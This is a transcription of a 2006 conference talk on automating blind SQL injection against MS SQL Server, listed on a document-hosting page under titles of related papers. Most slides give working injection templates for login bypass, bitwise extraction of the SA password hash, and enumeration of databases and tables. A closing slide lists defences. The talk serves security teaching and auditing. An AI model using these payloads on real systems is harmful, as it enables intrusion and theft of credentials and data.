Automating SQL Injection Exploits

Similar documents
Black Hat Briefings USA 2004 Cameron Hotchkies

SQL Injection Protection by Variable Normalization of SQL Statement

Webapps Vulnerability Report

SQL Injection and Data Mining through Inference

SQL injection: Not only AND 1=1. The OWASP Foundation. Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd

INTRUSION PROTECTION AGAINST SQL INJECTION ATTACKS USING REVERSE PROXY

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.

How I hacked PacketStorm ( )

Advanced PostgreSQL SQL Injection and Filter Bypass Techniques

Serious Threat. Targets for Attack. Characterization of Attack. SQL Injection 4/9/2010 COMP On August 17, 2009, the United States Justice

Time-Based Blind SQL Injection using Heavy Queries A practical approach for MS SQL Server, MS Access, Oracle and MySQL databases and Marathon Tool

BLIND SQL INJECTION (UBC)

White Paper. Blindfolded SQL Injection

PHP/MySQL SQL Injections: Understanding MySQL Union Poisoining. Jason A. Medeiros :: CEO :: Presented for DC619 All Content Grayscale Research 2008

SQL Injection. SQL Injection. CSCI 4971 Secure Software Principles. Rensselaer Polytechnic Institute. Spring

SQL Injection Optimization and Obfuscation Techniques

SQL Injection. Sajjad Pourali CERT of Ferdowsi University of Mashhad

Using SQL Server Management Studio

VIDEO intypedia007en LESSON 7: WEB APPLICATION SECURITY - INTRODUCTION TO SQL INJECTION TECHNIQUES. AUTHOR: Chema Alonso

SQL Injection January 23, 2013

Exposed Database( SQL Server) Error messages Delicious food for Hackers

SQL Injection for newbie

External Network & Web Application Assessment. For The XXX Group LLC October 2012

A Tokenization and Encryption based Multi-Layer Architecture to Detect and Prevent SQL Injection Attack

Start Secure. Stay Secure. Blind SQL Injection. Are your web applications vulnerable? By Kevin Spett

Blindfolded SQL Injection. Written By: Ofer Maor Amichai Shulman

The SQL Injection and Signature Evasion

Web Application Disassembly with ODBC Error Messages By David Litchfield Director of Security

SQL Server An Overview

Botnet-Powered SQL Injection Attacks A Deeper Look Within (VB, Sep. 2009) David Maciejak Guillaume Lovet

Analysis of SQL injection prevention using a proxy server

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

SQL INJECTION ATTACKS By Zelinski Radu, Technical University of Moldova

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Understanding Sql Injection

Ficha técnica de curso Código: IFCPR140c. SQL Injection Attacks and Defense

Testing Web Applications for SQL Injection Sam Shober

SQL Injection in web applications

Maintaining Stored Procedures in Database Application

PHP Magic Tricks: Type Juggling. PHP Magic Tricks: Type Juggling

Security Test s i t ng Eileen Donlon CMSC 737 Spring 2008

Security Awareness For Server Administrators. State of Illinois Central Management Services Security and Compliance Solutions

Yuan Fan Arcsight. Advance SQL Injection Detection by Join Force of Database Auditing and Anomaly Intrusion Detection

Blind SQL Injection Are your web applications vulnerable?

SQL Injection. The ability to inject SQL commands into the database engine through an existing application

Thick Client Application Security

Input Validation Vulnerabilities, Encoded Attack Vectors and Mitigations OWASP. The OWASP Foundation. Marco Morana & Scott Nusbaum

NETWORK SECURITY: How do servers store passwords?

Data-mining with SQL Injection and Inference

METHODS OF QUICK EXPLOITATION OF BLIND SQL INJECTION DMITRY EVTEEV

Agenda. SQL Injection Impact in the Real World Attack Scenario (1) CHAPTER 8 SQL Injection

FmPro Migrator - FileMaker to SQL Server

Web Application Firewall Bypassing

AQA GCSE in Computer Science Computer Science Microsoft IT Academy Mapping

Technical Data Sheet: imc SEARCH 3.1. Topology

Cyber Security Challenge Australia 2014

Title. Syntax. stata.com. odbc Load, write, or view data from ODBC sources. List ODBC sources to which Stata can connect odbc list

SQL Injection Attacks: Detection in a Web Application Environment

5 Simple Steps to Secure Database Development

Advanced SQL Injection

Project 2: Web Security Pitfalls

White Paper BMC Remedy Action Request System Security

Instant SQL Programming

Manipulating Microsoft SQL Server Using SQL Injection

Web Application Security

Web Application Security

1. What is SQL Injection?

Oracle Audit Vault and Database Firewall

Token Sequencing Approach to Prevent SQL Injection Attacks

Oracle Data Redaction is Broken

Finding XSS in Real World

Package sjdbc. R topics documented: February 20, 2015

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

Still Aren't Doing. Frank Kim

Database Security Guide

Web Application Hacking (Penetration Testing) 5-day Hands-On Course

AUTOMATE CRAWLER TOWARDS VULNERABILITY SCAN REPORT GENERATOR

Utility Software II lab 1 Jacek Wiślicki, jacenty@kis.p.lodz.pl original material by Hubert Kołodziejski

Oracle Database 10g Express

How Strings are Stored. Searching Text. Setting. ANSI_PADDING Setting

SQL Injection 2.0: Bigger, Badder, Faster and More Dangerous Than Ever. Dana Tamir, Product Marketing Manager, Imperva

EVENT LOG MANAGEMENT...

Data Breaches and Web Servers: The Giant Sucking Sound

SQL INJECTION TUTORIAL

Perl In Secure Web Development

Web Application Security

Threat Modeling. Categorizing the nature and severity of system vulnerabilities. John B. Dickson, CISSP

Top 10 Web Application Security Vulnerabilities - with focus on PHP

Web Development using PHP (WD_PHP) Duration 1.5 months

Violating The Corporate Database. Presented by Dan Cornforth Brightstar, IT Security Summit, April 2006

Transcription:

Automating SQL Injection Exploits Mike Shema <mikeshema@yahoo.com> IT Underground, Berlin 2006

Overview SQL injection vulnerabilities are pretty easy to detect. The true impact of a vulnerability is measured by the quality of information or access that can be gained with a SQL injection exploit.

Why Automate?

Why Automate? An audit is only as good as the auditors. Verify the potential impact of a vulnerability. Enumeration follows a standard methodology (i.e. one that can automated). Enumeration can be tedious.

Types of Exploits Process alteration Bypass a login prompt (' OR 1=1) Direct enumeration Display the results of an arbitrary query Indirect enumeration Indicate the success of an arbitrary query Command execution Access some extended functionality of the database

Direct Enumeration Via UNION Determine number of columns Determine acceptable column types Create custom SELECT Parse response

Examples

Indirect Enumeration

Indirect Enumeration Determine presence of vulnerability Characterize positive response AND 1 Characterize negative response AND 0 Create custom SELECT Retrieve a single record. Must be able to iterate each bit value of the record.

Bitwise Enumeration Walk through the value bit by bit Advantages String may be of arbitrary length String may be of arbitrary content Disadvantages Can take a long time Subtle differences in handling different data type e.g. VARBINARY may contain 0x00 characters

Bitwise Enumeration Convert string index to integer CONVERT(INT,SUBSTRING(str,index,1)) Convert NVARCHAR (Unicode) string index to integer CONVERT(INT,SUBSTRING(str,index,1)) Many other encodings or functions are possible ASCII() BYTE

Bitwise Enumeration Core concept demonstrated in Python: >>> a = 'a' <-- 'a' = 0x97 >>> for i in range(0,8):... ord(a) & 2**i <-- bitwise AND... 1 0 0 0 0 32 64 0

Bitwise Enumeration Core concept applied in SQL: SELECT 1 FROM 'a' & 1; 1 SELECT 2 FROM 'a' & 2; 0 SELECT 4 FROM 'a' & 4; 0 SELECT 8 FROM 'a' & 8; 0 SELECT 16 FROM 'a' & 16; 0 SELECT 32 FROM 'a' & 32; 1 SELECT 64 FROM 'a' & 64; 1 SELECT 128 FROM 'a' & 128; 0

Parsing the Responses Record responses, e.g. false (0) true (1) true (1) false (0) false (0) false (0) false (0) true (1) 01100001 = 0x97 = 'a'

Tips for Preparing the Query Use hexadecimal string representation in WHERE clauses. Avoid single quotes. Can also handle Unicode strings. For example: 'mike' = 0x6d696b65 'mike' = 0x6d0069006b006500 (Unicode)

Bitwise Enumeration How many requests? 8 per character (strings, binary values) 7 if you know the result only contains ASCII text 32 per integer Examples sa password Information schema Databases (catalogs), Tables, Columns Multi-record results

Bitwise Query Template AND #n# IN (SELECT CONVERT(INT,SUBSTRING(#COL#,#i#,1) ) & #n# FROM #CLAUSE#

Example: MS SQL Server Enumerate SA password hash. Column: password Clause: master.dbo.sysxlogins WHERE name LIKE 0x73006100 Need to enumerate a 48 byte hash.

Example: MS SQL Server Complete query: AND #n# IN ( SELECT CONVERT(INT,SUBSTRING(password,#i#,1) & #n# FROM master.dbo.sysxlogins WHERE name LIKE 0x73006100 )

Example: MS SQL Server Enumerate every database: SELECT DB_NAME(0) SELECT DB_NAME(1) SELECT DB_NAME(2) SELECT DB_NAME(...) Iterate until no record is returned. Query returns a single record as a string.

Example: MS SQL Server Complete query: AND #N# IN ( SELECT ASCII( SUBSTRING(DB_NAME(0),#I#,1) ) & #N# )

Example: MS SQL Server Now that we have every database name, the next step is to grab all of the tables. 1) Obtain the table's id (enumerate an integer) 2) Obtain the table's name (enumerate a string) Walk through each table by increasing the minimum BETWEEN range. Enumerate the table's name based on its id value.

Example: MS SQL Server Walk through each table by increasing the minimum BETWEEN range. SELECT TOP 1 id FROM [db..]sysobjects WHERE xtype LIKE 0x55 AND id BETWEEN 0 AND 2147483647 BETWEEN 5557508 AND 2147483647... ORDER BY id

Example: MS SQL Server Complete query: AND #N# IN ( SELECT TOP 1 CONVERT(VARBINARY,id) & #N# FROM [db..]sysobjects WHERE xtype LIKE 0x55 AND id BETWEEN 0 AND 2147483647 ORDER BY id )

Example: MS SQL Server Enumerate the table's name based on its id value: SELECT name FROM [db..]sysobjects WHERE xtype LIKE 0x55 AND id=id

Example: MS SQL Server The complete query: AND #N# IN ( SELECT CONVERT(VARBINARY, CONVERT(VARCHAR, SUBSTRING(name,#I#,1)) ) & #N# FROM [db..]sysobjects WHERE xtype LIKE 0x55 AND id=id )

Paros Plugin

Paros Plugin AbstractPlugin.java matchbodycontent() TestInjectionSQLBitwise.java Currently targets MS SQL Server Enumerate Database host name User name for database connection SA password hash Each database, table

Challenges

Parse HTML Reponses Determining parameters that affect content. Comparing dynamic content. Comparisons that don't require manual intervention.

Parse HTML Reponses HTML Comments <!-- ServerInfo: BAYPPLOGU2A07 2005.08.30.21.29.11 Live1 ExclusiveNew LocVer:0 --> <!-- ServerInfo: BAYPPLOGU2B01 2005.08.30.21.29.11 Live1 ExclusiveNew LocVer:0 --> <!-- ServerInfo: BAYPPLOGU3B07 2005.08.30.21.29.11 Live1 ExclusiveNew LocVer:0 -->

Parse HTML Reponses Other HTML elements <META name="dateinsecssinceepoch" content="1134594211"> <META name="dateinsecssinceepoch" content="1134594292"> Different anchor (<a>) content Ad banner constructs

Parse HTML Reponses Timestamps Wednesday, December 14 2005: 15:50:51 Page generated in: 0.0013 seconds Page generated in 0.325261 seconds Updated: 12:48 PM PST GENERATED: Wednesday, 14-Dec-2005 20:07:07 GMT

Complex Queries Handling large record sets. Handling unknown data types. Problems with GROUP BY and ORDER BY

Countermeasures

Countermeasures These attacks rely on normal SQL injection attack vectors. Create queries with bound parameters Use stored procedures where possible Don't use string concatenation to build it! Perform strong input validation Most important to reduce access privileges for the application's database connection!

Questions?

Addition Information Data-mining with SQL Injection and Inference, David Litchfield www.ngssoftware.com/papers/sqlinference.pdf Absinthe: SQL injection automation (tool & slides) www.0x90.org/releases/absinthe/ (more) Advanced SQL Injection, Chris Anley www.ngssoftware.com/papers/more_advanced_sql_injection.pdf Advanced SQL Injection in SQL Server Applications, Chris Anley www.ngssoftware.com/papers/advanced_sql_injection.pdf Blind SQL Injection: Are your web applications vulnerable?, Kevin Spett www.spidynamics.com/assets/documents/blind_sqlinjection.pdf...and the movies of John Carpenter (www.theofficialjohncarpenter.com)

Thank You!

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information